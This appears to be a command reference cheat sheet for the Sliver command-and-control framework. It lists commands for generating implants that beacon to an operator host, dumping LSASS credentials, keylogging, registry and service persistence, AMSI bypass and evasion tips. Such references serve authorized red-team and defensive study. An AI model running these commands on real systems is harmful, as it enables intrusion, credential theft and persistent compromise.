Appearance
Sliver C2 Framework Cheat Sheet
Overview
Sliver is a modern, open-source cross-platform adversary emulation/red team framework designed as an alternative to Cobalt Strike. It provides advanced command and control capabilities with support for multiple platforms, evasive communications, and team-based operations.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.
Installation
Pre-compiled Binaries (Recommended)
bash
# Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server
chmod +x sliver-server
# Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server
chmod +x sliver-server
# Download latest release for Windows
# Download sliver-server_windows.exe from GitHub releasesBuild from Source
bash
# Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git
cd sliver
makeDocker Installation
bash
# Pull official Docker image
docker pull bishopfox/sliver
# Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliverBasic Usage
Starting Sliver Server
bash
# Start the server (first run will generate certificates)
./sliver-server
# Start server with custom configuration
./sliver-server -c /path/to/config.json
# Start server in daemon mode
./sliver-server daemonClient Connection
bash
# Connect to local server
./sliver-client
# Connect to remote server
./sliver-client -c /path/to/client.cfg
# Generate new client configuration
./sliver-server operator --name username --lhost server-ipCommand Reference
Server Management
| Command | Description |
|---|---|
help | Display help information |
version | Show version information |
operators | List connected operators |
kick-operator <name> | Disconnect an operator |
armory | Access the Sliver armory (extensions) |
Listener Management
| Command | Description |
|---|---|
mtls | Start mTLS listener |
wg | Start WireGuard listener |
http | Start HTTP listener |
https | Start HTTPS listener |
dns | Start DNS listener |
jobs | List active listeners |
jobs -k <id> | Kill a listener |
Implant Generation
| Command | Description |
|---|---|
generate | Generate implant |
generate --mtls <host:port> | Generate mTLS implant |
generate --http <url> | Generate HTTP implant |
generate --dns <domain> | Generate DNS implant |
profiles | List implant profiles |
profiles new <name> | Create new profile |
Session Management
| Command | Description |
|---|---|
sessions | List active sessions |
use <session-id> | Interact with session |
background | Background current session |
sessions -k <id> | Kill a session |
sessions -K | Kill all sessions |
Listener Setup
mTLS Listener (Recommended)
bash
# Start mTLS listener on default port (8888)
mtls
# Start mTLS listener on custom port
mtls -l 443
# Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888HTTP/HTTPS Listeners
bash
# Start HTTP listener
http -l 80
# Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem
# Start HTTP listener with custom domain
http -l 80 -d example.comDNS Listener
bash
# Start DNS listener
dns -d example.com
# Start DNS listener with custom nameserver
dns -d example.com -l 53WireGuard Listener
bash
# Start WireGuard listener
wg -l 53
# Start WireGuard listener with custom key port
wg -l 53 -x 1234Implant Generation
Basic Implant Generation
bash
# Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe
# Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf
# Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format machoAdvanced Implant Options
bash
# Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant
# Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols
# Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode
# Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format sharedStaged Payloads
bash
# Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged
# Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exeSession Interaction
Basic Session Commands
bash
# Get system information
info
# Get current user
whoami
# Get current working directory
pwd
# List files and directories
ls
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/Process Management
bash
# List processes
ps
# Get current process info
getpid
# Migrate to another process
migrate <pid>
# Execute command
execute <command>
# Start interactive shell
shell
# Terminate process
terminate <pid>Network Operations
bash
# Get network interfaces
ifconfig
# Get network connections
netstat
# Port forward
portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80
# List port forwards
portfwd
# Remove port forward
portfwd rm --id <id>
# SOCKS proxy
socks5 start
# Stop SOCKS proxy
socks5 stopPrivilege Escalation
bash
# Get current privileges
getprivs
# Attempt privilege escalation
getsystem
# Run as different user
runas -u username -p password <command>
# Impersonate token
impersonate <token-id>
# Revert to self
rev2selfPersistence
bash
# Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe
# Install registry persistence
persistence registry --hive HKCU --path "Software\\Microsoft\\Windows\\CurrentVersion\\Run" --key "MyApp"
# Remove persistence
persistence remove --id <persistence-id>Advanced Features
Pivoting and Lateral Movement
bash
# Generate pivot listener
pivots tcp --bind 0.0.0.0:9999
# Connect through pivot
generate --mtls pivot-host:9999 --os windows
# List active pivots
pivots
# Stop pivot
pivots --id <id> stopCredential Harvesting
bash
# Dump process memory
procdump -p <pid> -s /tmp/dump.dmp
# Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp
# Screenshot
screenshot
# Keylogger
keylogger start
keylogger dump
keylogger stopEvasion Techniques
bash
# Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe
# In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe
# PowerShell execution
powershell -c "Get-Process"
# Bypass AMSI
armory install bypass-amsiProfiles and Templates
Creating Profiles
bash
# Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64
# Generate from profile
generate --profile windows-profile
# List profiles
profiles
# Delete profile
profiles rm windows-profileC2 Profile Customization
bash
# HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website
# HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443Armory Extensions
Installing Extensions
bash
# Update armory
armory update
# Install extension
armory install <extension-name>
# List available extensions
armory
# List installed extensions
armory installedPopular Extensions
bash
# Process injection techniques
armory install process-injection
# Credential dumping
armory install credman
# Registry operations
armory install registry
# WMI operations
armory install wmiTeam Operations
Multi-Operator Setup
bash
# Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg
# Connect as operator
./sliver-client -c operator1.cfg
# List connected operators
operators
# Send message to operators
msg "Hello team!"Session Sharing
bash
# Share session with team
sessions -i <session-id> --shared
# Take control of shared session
use <session-id>Troubleshooting
Common Issues
Connection Problems
bash
# Check listener status
jobs
# Restart listener
jobs -k <listener-id>
mtls -l 8888
# Check firewall rules
# Ensure ports are open on serverImplant Detection
bash
# Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug
# Try different communication protocols
generate --dns example.com --os windows
# Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windowsPerformance Issues
bash
# Adjust beacon interval
use <session-id>
reconfig --beacon-interval 60s
# Use compression
reconfig --compressDebugging
bash
# Enable debug mode
./sliver-server --debug
# Check logs
tail -f ~/.sliver/logs/sliver.log
# Verbose client output
./sliver-client --debugSecurity Considerations
Operational Security
- Use encrypted communications (mTLS recommended)
- Regularly rotate certificates and keys
- Implement proper access controls for operators
- Monitor and log all activities
- Use staging servers to avoid direct attribution
Evasion Best Practices
- Vary beacon intervals and jitter
- Use legitimate-looking domains and certificates
- Implement domain fronting where possible
- Use multiple communication channels
- Regularly update implants and techniques
Resources
- Official Sliver Documentation
- Sliver GitHub Repository
- Bishop Fox Blog
- Sliver Community Wiki
- Red Team Village Sliver Training
This cheat sheet provides a comprehensive reference for using Sliver C2 Framework. Always ensure you have proper authorization before using this tool in any environment.